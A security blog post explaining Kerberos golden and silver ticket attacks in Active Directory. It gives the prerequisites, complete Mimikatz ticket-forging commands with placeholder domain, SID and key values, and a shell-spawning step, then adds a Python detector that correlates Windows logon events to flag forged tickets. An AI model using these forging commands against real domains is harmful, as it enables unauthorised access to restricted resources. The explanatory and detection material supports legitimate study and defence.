If you're in the realm of cybersecurity, you're probably already aware that most, if not all, processes and architectures are vulnerable to something, some more than others. In this post, we'll be diving into two Kerberos attacks that can result in undesired authentication and, therefore, access to restricted resources in an Active Directory environment.
Prerequisites to Golden and Silver Ticket Attacks
Prior to executing each of these attacks, there's information you need in order to carry them out successfully. You can think of these requirements as "recipes," where you need certain ingredients to bake the nefarious authentication cake. To acquire these ingredients, Mimikatz will be your friend. Specifically, the sekurlsa::ekeys module will give you access to the Kerberos keys you need to forge tickets. Note that using that module requires elevated privileges on the host where it runs.
This post won't dive into the initial compromise or gaining access, but will rather focus on the information needed and the how-to of golden and silver ticket attacks.
Golden Ticket Attack
In a golden ticket attack, the attacker compromises the Kerberos authentication process by forging a ticket granting ticket (TGT). In the normal authentication process, the TGT is the token that allows a user to request additional accesses (service tickets) from the ticket granting service (TGS). Those service tickets grant access to services and resources on the Active Directory network.
In order to forge a TGT, the following is required:
The AES256 key or RC4 key (the NTLM hash) of the krbtgt account (AES256 is preferred; it stands out less in the logs)
The domain SID
The domain name
The user account being impersonated
Once that information is acquired, use Mimikatz to perform the attack:
mimikatz # kerberos::golden /User:Matryoshka /domain:atomicmatryoshka.local /sid:S-1-5-21-1234567890-0987654321-123456789 /id:500 /aes256:a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2 /startoffset:0 /endin:600 /renewmax:10080 /ptt
The ticket is now in memory. You can run the following command to spawn a cmd shell:
mimikatz # misc::cmd
Once the command prompt is up, you will be able to remote into and access resources you were previously unable to access.
Silver Ticket Attack
In a silver ticket attack, the attacker compromises the latter part of the Kerberos authentication process by forging ticket granting service (TGS) tickets directly, without ever contacting the domain controller for a TGT. While a golden ticket attack allows the attacker to request tickets for any resource across the domain, a silver ticket attack allows the attacker to access one specific service/resource on the domain.
In order to forge a TGS ticket, the following is required:
The domain SID
The domain name
The user account being impersonated
The target server
The target service name
The AES256 key or RC4 key (the NTLM hash) of the target server's machine account password
Once that information is acquired, use Mimikatz to perform the attack:
mimikatz # kerberos::golden /User:Matryoshka /domain:atomicmatryoshka.local /sid:S-1-5-21-1234567890-0987654321-123456789 /aes256:a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2 /target:atomic-dc.atomicmatryoshka.local /service:cifs /startoffset:0 /endin:600 /renewmax:10080 /ptt
The ticket is now in memory. You can now spawn a cmd shell to access the service/resource:
mimikatz # misc::cmd
Once the command prompt is up, you can access the resource you specified in the initial portion of the attack.
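A defender-side check that follows from both sections above: a forged TGT never goes through the domain controller's TGT issuance (event 4768), and a forged service ticket never goes through its service ticket issuance (event 4769), so ticket use with no preceding issuance event is the signal to look for. This is an added example written for this post, not code from the original; the event shapes, field names and the sample records are constructed assumptions, and it also flags RC4-encrypted service tickets (0x17) since the post notes AES256 stands out less.

```python
from datetime import datetime, timedelta

# Constructed sample events, not real logs. 4768 (TGT issued) and 4769 (service
# ticket issued) are logged on the DC; 4624 (network logon) on the target server.
# "target" is the server name; for 4769 it would come from the Service Name field.
EVENTS = [
    {"id": 4768, "time": "2024-05-01 08:00:00", "account": "alice", "target": "dc01", "etype": 0x12},
    {"id": 4769, "time": "2024-05-01 08:01:00", "account": "alice", "target": "fs01", "etype": 0x12},
    {"id": 4624, "time": "2024-05-01 08:01:05", "account": "alice", "target": "fs01", "etype": None},
    # Golden ticket pattern: service tickets requested on a TGT the DC never issued.
    {"id": 4769, "time": "2024-05-01 09:30:00", "account": "Matryoshka", "target": "fs01", "etype": 0x17},
    # Silver ticket pattern: Kerberos logon on the target with no service ticket from the DC.
    {"id": 4624, "time": "2024-05-01 10:00:00", "account": "Matryoshka", "target": "atomic-dc", "etype": None},
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def _preceded_by(event, candidates, window, same_target):
    """True if a candidate for the same account (and target) precedes event within window."""
    t = _ts(event["time"])
    for c in candidates:
        if c["account"] != event["account"]:
            continue
        if same_target and c["target"] != event["target"]:
            continue
        delta = t - _ts(c["time"])
        if timedelta(0) <= delta <= window:
            return True
    return False

def find_ticket_anomalies(events, tgt_lifetime=timedelta(hours=10), logon_window=timedelta(minutes=5)):
    """Return (kind, account, time) for ticket use that has no expected predecessor event."""
    findings = []
    tgts = [e for e in events if e["id"] == 4768]
    tgss = [e for e in events if e["id"] == 4769]
    for e in tgss:
        # A forged TGT is never issued by the DC, so its service-ticket requests have no 4768.
        if not _preceded_by(e, tgts, tgt_lifetime, same_target=False):
            findings.append(("tgs_without_tgt", e["account"], e["time"]))
        # 0x17 = RC4-HMAC: out of place when the domain otherwise issues AES tickets.
        if e["etype"] == 0x17:
            findings.append(("rc4_service_ticket", e["account"], e["time"]))
    for e in (x for x in events if x["id"] == 4624):
        # A forged service ticket is never requested from the DC, so the logon has no 4769.
        if not _preceded_by(e, tgss, logon_window, same_target=True):
            findings.append(("logon_without_tgs", e["account"], e["time"]))
    return findings

if __name__ == "__main__":
    for kind, account, when in find_ticket_anomalies(EVENTS):
        print(f"{when}  {kind:20}  {account}")
```

In a real deployment the 4768/4769 records come from the domain controllers and the 4624 records from the member servers, so the correlation requires centralized logging with synchronized clocks.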